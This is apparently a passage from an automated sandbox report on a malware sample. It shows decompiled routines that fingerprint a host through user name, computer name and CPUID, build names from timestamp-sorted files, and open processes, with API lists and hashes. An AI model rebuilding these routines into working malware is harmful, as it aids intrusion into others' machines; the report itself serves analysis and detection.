                                                                                                                                                                                              					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                              					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                              					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                              				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                              				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                              				 *_t148 = _t91;
                                                                                                                                                                                              				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                              				_t93 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t16 = _t93 + 0xdfe809; // 0x642e2a5c
                                                                                                                                                                                              				_v40 = _t146;
                                                                                                                                                                                              				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                              				__imp__(_v20, _t16);
                                                                                                                                                                                              				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                              				_v16 = _t96;
                                                                                                                                                                                              				if(_t96 == _t134) {
                                                                                                                                                                                              					_t146 = 0;
                                                                                                                                                                                              					goto L34;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                              				while(_t99 > 0) {
                                                                                                                                                                                              					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                              					if(_t101 == 0) {
                                                                                                                                                                                              						FindClose(_v16);
                                                                                                                                                                                              						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                              						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                              						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t109 = _v44;
                                                                                                                                                                                              					if(_v12 <= _t109) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t140 = _v12;
                                                                                                                                                                                              					if(_t140 > _v32) {
                                                                                                                                                                                              						_t141 = _v36;
                                                                                                                                                                                              						 *_a4 = _t141;
                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                              							_t128 =  *_t141;
                                                                                                                                                                                              							if(_t128 == 0) {
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_t128 < 0x30) {
                                                                                                                                                                                              								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t141 = _t141 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v12 = 1;
                                                                                                                                                                                              						FindClose(_v16); // executed
                                                                                                                                                                                              						_t146 = 0;
                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t165 = _t140 - _t109;
                                                                                                                                                                                              					L15:
                                                                                                                                                                                              					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                              						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                              						_t139 = _v40;
                                                                                                                                                                                              						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                              						_t113 = 0;
                                                                                                                                                                                              						if(_t139 != 0) {
                                                                                                                                                                                              							_t48 = _t151 - 4; // -4
                                                                                                                                                                                              							_t113 = _t48;
                                                                                                                                                                                              							if(_t113 > _t151) {
                                                                                                                                                                                              								_t113 = 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t151 > 4) {
                                                                                                                                                                                              							_t151 = 4;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                              						_t154 = _t154 + 0xc;
                                                                                                                                                                                              						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                              						if(_t119 == 0) {
                                                                                                                                                                                              							FindClose(_v16);
                                                                                                                                                                                              							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                              					_v12 = _v12 + 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











































                                                                                                                                                                                              0x00df32c3
                                                                                                                                                                                              0x00df32c9
                                                                                                                                                                                              0x00df32cb
                                                                                                                                                                                              0x00df32e5
                                                                                                                                                                                              0x00df32e7
                                                                                                                                                                                              0x00df32ec
                                                                                                                                                                                              0x00df3561
                                                                                                                                                                                              0x00df3568
                                                                                                                                                                                              0x00df3568
                                                                                                                                                                                              0x00df32f2
                                                                                                                                                                                              0x00df3307
                                                                                                                                                                                              0x00df3309
                                                                                                                                                                                              0x00df330b
                                                                                                                                                                                              0x00df3310
                                                                                                                                                                                              0x00df3551
                                                                                                                                                                                              0x00df355b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df355b
                                                                                                                                                                                              0x00df3316
                                                                                                                                                                                              0x00df3321
                                                                                                                                                                                              0x00df3326
                                                                                                                                                                                              0x00df332b
                                                                                                                                                                                              0x00df332e
                                                                                                                                                                                              0x00df3335
                                                                                                                                                                                              0x00df333a
                                                                                                                                                                                              0x00df333f
                                                                                                                                                                                              0x00df3541
                                                                                                                                                                                              0x00df354b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df354b
                                                                                                                                                                                              0x00df3355
                                                                                                                                                                                              0x00df3359
                                                                                                                                                                                              0x00df335c
                                                                                                                                                                                              0x00df335f
                                                                                                                                                                                              0x00df3365
                                                                                                                                                                                              0x00df336a
                                                                                                                                                                                              0x00df3373
                                                                                                                                                                                              0x00df3379
                                                                                                                                                                                              0x00df3383
                                                                                                                                                                                              0x00df338a
                                                                                                                                                                                              0x00df338a
                                                                                                                                                                                              0x00df339c
                                                                                                                                                                                              0x00df33a7
                                                                                                                                                                                              0x00df33b5
                                                                                                                                                                                              0x00df33ba
                                                                                                                                                                                              0x00df33bf
                                                                                                                                                                                              0x00df33c2
                                                                                                                                                                                              0x00df33c7
                                                                                                                                                                                              0x00df33d1
                                                                                                                                                                                              0x00df33d4
                                                                                                                                                                                              0x00df33d7
                                                                                                                                                                                              0x00df33ed
                                                                                                                                                                                              0x00df33ef
                                                                                                                                                                                              0x00df33f4
                                                                                                                                                                                              0x00df353f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df353f
                                                                                                                                                                                              0x00df340b
                                                                                                                                                                                              0x00df345c
                                                                                                                                                                                              0x00df341f
                                                                                                                                                                                              0x00df3427
                                                                                                                                                                                              0x00df342c
                                                                                                                                                                                              0x00df343a
                                                                                                                                                                                              0x00df3443
                                                                                                                                                                                              0x00df344c
                                                                                                                                                                                              0x00df344c
                                                                                                                                                                                              0x00df345a
                                                                                                                                                                                              0x00df345a
                                                                                                                                                                                              0x00df3460
                                                                                                                                                                                              0x00df3464
                                                                                                                                                                                              0x00df3464
                                                                                                                                                                                              0x00df346a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df346c
                                                                                                                                                                                              0x00df3472
                                                                                                                                                                                              0x00df3519
                                                                                                                                                                                              0x00df351c
                                                                                                                                                                                              0x00df3529
                                                                                                                                                                                              0x00df3529
                                                                                                                                                                                              0x00df352d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df3522
                                                                                                                                                                                              0x00df3526
                                                                                                                                                                                              0x00df3526
                                                                                                                                                                                              0x00df3528
                                                                                                                                                                                              0x00df3528
                                                                                                                                                                                              0x00df3532
                                                                                                                                                                                              0x00df3539
                                                                                                                                                                                              0x00df353b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df353b
                                                                                                                                                                                              0x00df3478
                                                                                                                                                                                              0x00df347a
                                                                                                                                                                                              0x00df347a
                                                                                                                                                                                              0x00df348d
                                                                                                                                                                                              0x00df3493
                                                                                                                                                                                              0x00df349e
                                                                                                                                                                                              0x00df34a0
                                                                                                                                                                                              0x00df34a4
                                                                                                                                                                                              0x00df34a6
                                                                                                                                                                                              0x00df34a6
                                                                                                                                                                                              0x00df34ab
                                                                                                                                                                                              0x00df34ad
                                                                                                                                                                                              0x00df34ad
                                                                                                                                                                                              0x00df34ab
                                                                                                                                                                                              0x00df34b2
                                                                                                                                                                                              0x00df34b6
                                                                                                                                                                                              0x00df34b6
                                                                                                                                                                                              0x00df34c6
                                                                                                                                                                                              0x00df34cb
                                                                                                                                                                                              0x00df34ce
                                                                                                                                                                                              0x00df34ce
                                                                                                                                                                                              0x00df34d1
                                                                                                                                                                                              0x00df34db
                                                                                                                                                                                              0x00df34e3
                                                                                                                                                                                              0x00df34e8
                                                                                                                                                                                              0x00df34f6
                                                                                                                                                                                              0x00df34f6
                                                                                                                                                                                              0x00df350a
                                                                                                                                                                                              0x00df350e
                                                                                                                                                                                              0x00df350e

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00DF32E5
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00DF3307
                                                                                                                                                                                              • memset.NTDLL ref: 00DF3321
                                                                                                                                                                                                • Part of subcall function 00DF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00DF333A,73797325), ref: 00DF77F7
                                                                                                                                                                                                • Part of subcall function 00DF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DF7811
                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DF335F
                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DF3373
                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00DF338A
                                                                                                                                                                                              • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DF3396
                                                                                                                                                                                              • lstrcat.KERNEL32(?,642E2A5C), ref: 00DF33D7
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF33ED
                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,?), ref: 00DF340B
                                                                                                                                                                                              • FindNextFileA.KERNEL32(00DF207E,?), ref: 00DF341F
                                                                                                                                                                                              • FindClose.KERNEL32(00DF207E), ref: 00DF342C
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF3438
                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,?), ref: 00DF345A
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,0000002E), ref: 00DF348D
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 00DF34C6
                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00DF207E,?), ref: 00DF34DB
                                                                                                                                                                                              • FindClose.KERNEL32(00DF207E), ref: 00DF34E8
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF34F4
                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,?), ref: 00DF3504
                                                                                                                                                                                              • FindClose.KERNEL32(00DF207E), ref: 00DF3539
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00DF354B
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00DF355B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2944988578-0
                                                                                                                                                                                              • Opcode ID: 81606fd938ed36002fde1e9643d7ebc46fd5939fd699b809cf78110680709a6b
                                                                                                                                                                                              • Instruction ID: b7614b852e43ca08cc7d0855541c02d827a5992474af5aebb12541485fe7420e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 81606fd938ed36002fde1e9643d7ebc46fd5939fd699b809cf78110680709a6b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2481287190021DEFDF119FA4DC84AFEBBB9EF44300F16846AE605E6260D7319A45CB70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                              			E00A810FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				struct _FILETIME* _v16;
                                                                                                                                                                                              				short _v60;
                                                                                                                                                                                              				struct _FILETIME* _t14;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t31 = __edx;
                                                                                                                                                                                              				_t14 =  &_v16;
                                                                                                                                                                                              				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                              				_push(0x192);
                                                                                                                                                                                              				_push(0x54d38000);
                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                              				L00A82180();
                                                                                                                                                                                              				_push(_t14);
                                                                                                                                                                                              				_v16 = _t14;
                                                                                                                                                                                              				_t15 =  *0xa84144;
                                                                                                                                                                                              				_push(_t15 + 0xa8505e);
                                                                                                                                                                                              				_push(_t15 + 0xa85054);
                                                                                                                                                                                              				_push(0x16);
                                                                                                                                                                                              				_push( &_v60);
                                                                                                                                                                                              				_v12 = _t31;
                                                                                                                                                                                              				L00A8217A();
                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                              				if(_t18 == 0) {
                                                                                                                                                                                              					_t18 = 0x1000;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t19 = CreateFileMappingW(0xffffffff, 0xa84148, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                              				_t34 = _t19;
                                                                                                                                                                                              				if(_t34 == 0) {
                                                                                                                                                                                              					_t32 = GetLastError();
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                              						if(_t22 == 0) {
                                                                                                                                                                                              							_t32 = GetLastError();
                                                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *_a8 = _t34;
                                                                                                                                                                                              							 *_a12 = _t22;
                                                                                                                                                                                              							_t32 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t32 = 2;
                                                                                                                                                                                              						L9:
                                                                                                                                                                                              						CloseHandle(_t34);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t32;
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00a810fc
                                                                                                                                                                                              0x00a81105
                                                                                                                                                                                              0x00a81109
                                                                                                                                                                                              0x00a8110f
                                                                                                                                                                                              0x00a81114
                                                                                                                                                                                              0x00a81119
                                                                                                                                                                                              0x00a8111c
                                                                                                                                                                                              0x00a8111f
                                                                                                                                                                                              0x00a81124
                                                                                                                                                                                              0x00a81125
                                                                                                                                                                                              0x00a81128
                                                                                                                                                                                              0x00a81133
                                                                                                                                                                                              0x00a8113a
                                                                                                                                                                                              0x00a8113e
                                                                                                                                                                                              0x00a81140
                                                                                                                                                                                              0x00a81141
                                                                                                                                                                                              0x00a81144
                                                                                                                                                                                              0x00a81149
                                                                                                                                                                                              0x00a81153
                                                                                                                                                                                              0x00a81155
                                                                                                                                                                                              0x00a81155
                                                                                                                                                                                              0x00a81169
                                                                                                                                                                                              0x00a8116f
                                                                                                                                                                                              0x00a81173
                                                                                                                                                                                              0x00a811c3
                                                                                                                                                                                              0x00a81175
                                                                                                                                                                                              0x00a8117e
                                                                                                                                                                                              0x00a81194
                                                                                                                                                                                              0x00a8119c
                                                                                                                                                                                              0x00a811ae
                                                                                                                                                                                              0x00a811b2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8119e
                                                                                                                                                                                              0x00a811a1
                                                                                                                                                                                              0x00a811a6
                                                                                                                                                                                              0x00a811a8
                                                                                                                                                                                              0x00a811a8
                                                                                                                                                                                              0x00a81189
                                                                                                                                                                                              0x00a8118b
                                                                                                                                                                                              0x00a811b4
                                                                                                                                                                                              0x00a811b5
                                                                                                                                                                                              0x00a811b5
                                                                                                                                                                                              0x00a8117e
                                                                                                                                                                                              0x00a811cb

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00A8175D,0000000A,?,?), ref: 00A81109
                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A8111F
                                                                                                                                                                                              • _snwprintf.NTDLL ref: 00A81144
                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(000000FF,00A84148,00000004,00000000,?,?), ref: 00A81169
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A8175D,0000000A,?), ref: 00A81180
                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A81194
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A8175D,0000000A,?), ref: 00A811AC
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A8175D,0000000A), ref: 00A811B5
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A8175D,0000000A,?), ref: 00A811BD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1724014008-0
                                                                                                                                                                                              • Opcode ID: 385994f6e81ce519b9b7eced3a2dac1bdde3566f9d74b4e51653818a17a47791
                                                                                                                                                                                              • Instruction ID: 1be014810131005a4beaceb4ff8fb50979ec08f201b2f990f5083c230f3e3f58
                                                                                                                                                                                              • Opcode Fuzzy Hash: 385994f6e81ce519b9b7eced3a2dac1bdde3566f9d74b4e51653818a17a47791
                                                                                                                                                                                              • Instruction Fuzzy Hash: C62180B2A00108BFDB10BFA4DC88EAE77BDEB58754F104229F716D7190D67059468B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E00DF93D5(char __eax, void* __esi) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                              				long _t34;
                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                              				long _t50;
                                                                                                                                                                                              				char _t59;
                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				void* _t64;
                                                                                                                                                                                              				char _t65;
                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t69 = __esi;
                                                                                                                                                                                              				_t65 = __eax;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v12 = __eax;
                                                                                                                                                                                              				if(__eax == 0) {
                                                                                                                                                                                              					_t59 =  *0xdfd270; // 0xd448b889
                                                                                                                                                                                              					_v12 = _t59;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t64 = _t69;
                                                                                                                                                                                              				E00DF6F89( &_v12, _t64);
                                                                                                                                                                                              				if(_t65 != 0) {
                                                                                                                                                                                              					 *_t69 =  *_t69 ^  *0xdfd2a0 ^ 0x76f6612d;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                              					_t50 = _v8;
                                                                                                                                                                                              					if(_t50 != 0) {
                                                                                                                                                                                              						_t62 = RtlAllocateHeap( *0xdfd238, 0, _t50 + _t50);
                                                                                                                                                                                              						if(_t62 != 0) {
                                                                                                                                                                                              							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                              								_t64 = _t62;
                                                                                                                                                                                              								 *_t69 =  *_t69 ^ E00DF7CF7(_v8 + _v8, _t64);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							HeapFree( *0xdfd238, 0, _t62);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t61 = __imp__;
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                              				_t34 = _v8;
                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                              					_t68 = RtlAllocateHeap( *0xdfd238, 0, _t34 + _t34);
                                                                                                                                                                                              					if(_t68 != 0) {
                                                                                                                                                                                              						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                              							_t64 = _t68;
                                                                                                                                                                                              							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00DF7CF7(_v8 + _v8, _t64);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						HeapFree( *0xdfd238, 0, _t68);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				asm("cpuid");
                                                                                                                                                                                              				_t67 =  &_v28;
                                                                                                                                                                                              				 *_t67 = 1;
                                                                                                                                                                                              				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                              				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                              				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                              				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                              				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                              				return _t39;
                                                                                                                                                                                              			}



















                                                                                                                                                                                              0x00df93d5
                                                                                                                                                                                              0x00df93dd
                                                                                                                                                                                              0x00df93e1
                                                                                                                                                                                              0x00df93e4
                                                                                                                                                                                              0x00df93e9
                                                                                                                                                                                              0x00df93eb
                                                                                                                                                                                              0x00df93f0
                                                                                                                                                                                              0x00df93f0
                                                                                                                                                                                              0x00df93f6
                                                                                                                                                                                              0x00df93f8
                                                                                                                                                                                              0x00df9405
                                                                                                                                                                                              0x00df9466
                                                                                                                                                                                              0x00df9407
                                                                                                                                                                                              0x00df940c
                                                                                                                                                                                              0x00df9412
                                                                                                                                                                                              0x00df9417
                                                                                                                                                                                              0x00df9425
                                                                                                                                                                                              0x00df9429
                                                                                                                                                                                              0x00df9438
                                                                                                                                                                                              0x00df943f
                                                                                                                                                                                              0x00df9446
                                                                                                                                                                                              0x00df9446
                                                                                                                                                                                              0x00df9451
                                                                                                                                                                                              0x00df9451
                                                                                                                                                                                              0x00df9429
                                                                                                                                                                                              0x00df9417
                                                                                                                                                                                              0x00df9468
                                                                                                                                                                                              0x00df946e
                                                                                                                                                                                              0x00df9478
                                                                                                                                                                                              0x00df947a
                                                                                                                                                                                              0x00df947f
                                                                                                                                                                                              0x00df948e
                                                                                                                                                                                              0x00df9492
                                                                                                                                                                                              0x00df949d
                                                                                                                                                                                              0x00df94a4
                                                                                                                                                                                              0x00df94ab
                                                                                                                                                                                              0x00df94ab
                                                                                                                                                                                              0x00df94b7
                                                                                                                                                                                              0x00df94b7
                                                                                                                                                                                              0x00df9492
                                                                                                                                                                                              0x00df94c2
                                                                                                                                                                                              0x00df94c4
                                                                                                                                                                                              0x00df94c7
                                                                                                                                                                                              0x00df94c9
                                                                                                                                                                                              0x00df94cc
                                                                                                                                                                                              0x00df94cf
                                                                                                                                                                                              0x00df94d9
                                                                                                                                                                                              0x00df94dd
                                                                                                                                                                                              0x00df94e1

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,?), ref: 00DF940C
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DF9423
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,?), ref: 00DF9430
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF9451
                                                                                                                                                                                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DF9478
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DF948C
                                                                                                                                                                                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DF9499
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF94B7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3239747167-0
                                                                                                                                                                                              • Opcode ID: 0f20184138a2c6beb4bd35625ac882f734140cb2c9eefd6a960216bc6277b9df
                                                                                                                                                                                              • Instruction ID: 5172e76ca8fcf75f534a6094f54dc67be1f76b0f0d3cbfe3c7dd5838f5552ddf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f20184138a2c6beb4bd35625ac882f734140cb2c9eefd6a960216bc6277b9df
                                                                                                                                                                                              • Instruction Fuzzy Hash: A431D7B1A00209EFDB10DFA9DD81ABEF7FAEF58300B558469E605D6210DB30DA46DB74
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                                                              			E00DF71B9(char _a4, void* _a8) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                              				void** _t33;
                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void** _t44;
                                                                                                                                                                                              				intOrPtr* _t47;
                                                                                                                                                                                              				char _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_v20 = _a4;
                                                                                                                                                                                              				_t48 = 0;
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				_a4 = 0;
                                                                                                                                                                                              				_v44 = 0x18;
                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                              					_t33 =  &_v8;
                                                                                                                                                                                              					__imp__(_v12, 8, _t33);
                                                                                                                                                                                              					if(_t33 >= 0) {
